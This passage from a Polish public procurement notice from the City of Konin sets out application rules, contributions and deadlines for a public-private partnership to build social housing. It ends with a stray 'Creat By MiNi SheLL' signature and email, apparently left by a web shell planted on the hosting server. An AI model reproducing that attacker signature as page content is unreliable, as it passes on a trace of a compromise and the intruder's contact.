a.postępowanie w sprawie dopuszczenia do udziału w dialogu (ocena złożonego wniosku), 
b.faza dialogu, 
c.faza składania ofert. 
5.Uwzględniając wyniki przeprowadzonego dialogu z Wykonawcami (Partnerami Prywatnymi), Zamawiający (Partner Publiczny) przewiduje możliwość zmiany swoich potrzeb i wymagań przed zaproszeniem do złożenia ofert. 
6.Przez okres trwania umowy Partner Prywatny utrzymuje i zarządza przedmiotem zamówienia, pobierając z przedsięwzięcia, będącego przedmiotem PPP, zapłatę od Podmiotu Publicznego w zamian za udzielenie Miastu prawa podnajmu mieszkań (wymaganie nie ma charakteru ostatecznego). 
7.Wkład własny Partnera Publicznego (Zamawiającego) to: 
a.nieruchomość gruntowa przekazana  nieodpłatnie w użyczenie w drodze umowy Partnerowi Prywatnemu na czas realizacji przedsięwzięcia w ramach partnerstwa publiczno - prywatnego -art.13 ust. 1a ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2004r. Nr 261, poz. 2603, 
z późn. zm.), ( wymaganie nie ma charakteru ostatecznego),
b.Program Funkcjonalno - Użytkowy. 
8.Wkład własny Partnera Prywatnego (Wykonawcy) lub instytucji finansującej powinien pokrywać 100% wydatków na jego realizację w zakresie projektowania 
i budowy budynku (wymaganie ma charakter ostateczny).
II.WYMAGANIA PODSTAWOWE. 
1)Każdy  Wykonawca może złożyć tylko jeden wniosek o dopuszczenie do udziału w dialogu, zwany dalej wnioskiem. 
2)Wniosek należy przygotować według wymagań określonych w niniejszym ogłoszeniu i uwzględniając w kolejności treść ustawy: o partnerstwie publiczno - prywatnym oraz Prawo zamówień publicznych.
3)Wniosek , dokumenty i  oświadczenia muszą być podpisane przez osoby upoważnione do reprezentowania Wykonawcy, oznacza to, że jeżeli z dokumentu określającego status prawny Wykonawcy wynika, iż do reprezentowania Wykonawcy upoważnionych jest łącznie kilka osób, dokumenty wchodzące w skład wniosku muszą być podpisane przez wszystkie te osoby.
4)Upoważnienie osób podpisujących wniosek do jego podpisania musi bezpośrednio wynikać z dokumentów dołączonych do wniosku. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej) to do wniosku należy dołączyć oryginał stosownego pełnomocnictwa wystawionego przez osoby upoważnione do reprezentowania Wykonawcy. 
5)Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem wniosku oraz z udziałem w postępowaniu. 
6)Numer nadany sprawie przez zamawiającego WP .341-29/10
7)Wzór wniosku  wraz z wymaganymi oświadczeniami i dokumentami dostępny na stronie www.konin.pl 
III.FORMA WNIOSKU. 
1)Wniosek  oświadczenia i dokumenty muszą być sporządzone w języku polskim, mieć formę pisemną,
oraz być złożone w formie oryginału lub kopii potwierdzonej przez wykonawcę.   
Dokumenty sporządzone w języku obcym winny być złożone wraz z tłumaczeniem na język polski. 
2)Całość wniosku powinna być złożona w formie uniemożliwiającej jej przypadkowe zdekompletowanie.
3)Wszystkie zapisane strony wniosku powinny być ponumerowane. 
4)Wszelkie miejsca we wniosku, w których Wykonawca naniósł poprawki lub zmiany wpisywanej przez siebie treści muszą być parafowane przez osobę (osoby) podpisującą (podpisujące) wniosek.
5)Wniosek i oświadczenia powinny mieć formę wydruku komputerowego lub maszynopisu.
6)Pożądane jest zamieszczenie we wniosku spisu treści z wyszczególnieniem ilości stron.
7)Wnioski złożone po wyznaczonym terminie nie będą rozpatrywane, zostaną  niezwłocznie  zwrócone Wykonawcom bez otwierania koperty na podany adres, 
8)Wniosek  należy złożyć w kopercie zaadresowanej według poniższego wzoru:
Nr Sprawy :WP.341-29/10  
Nazwa, adres Wykonawcy: 
Wniosek o dopuszczenie do udziału w dialogu konkurencyjnym na :Budowę wielorodzinnego,socjalnego budynku mieszkalnego w Koninie przy ul. Ludomiła Pułaskiego na działce nr 1675/57, obręb Przydziałki, w systemie partnerstwa publiczno - prywatnego zgodnie z ustawą z dnia 19 grudnia 2008r. o partnerstwie publiczno - prywatnym , (Dz. U. z 2009r., Nr.19, poz.100) ..</p><p><b>IV.4.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> Zamawiający nie przewiduje nagród dla Wykonawców, którzy podczas dialogu przedstawili rozwiązania stanowiące podstawę do składania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2010 godzina 11:00, miejsce: Urząd  Miejski w Koninie , 62-500 Konin , pl. Wolności 1 , pokój nr 303.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I.Partnerzy wspólnie ubiegający się o niniejsze zamówienie (zawarcie umowy o PPP ), zobowiązani są  do złożenia  wraz z wspólnym wnioskiem  pełnomocnictwa  do reprezentowania  wszystkich Partnerów w postępowaniu  i zawarcia umowy  o PPP.Wymagane dokumenty  określone odpowiednio w pkt. III.4.2 powinny być złożone  przez każdego z Partnerów  składającego wspólny wniosek.

II.Wykonawca może polegać na doświadczeniu,  osobach zdolnych do wykonania  zamówienia lub zdolnościach finansowych  innych podmiotów , niezależnie od charakteru prawnego łączących go  z  nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić  zamawiającemu , iż będzie  dysponował zasobami niezbędnymi do realizacji  zamówienia, a w szczególności przedstawiając w tym celu pisemne zobowiązanie  tych  podmiotów do oddania mu  do dyspozycji  niezbędnych zasobów na okres korzystania  z  nich przy wykonywaniu  zamówienia  (art.26 ust.2b ustawy)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com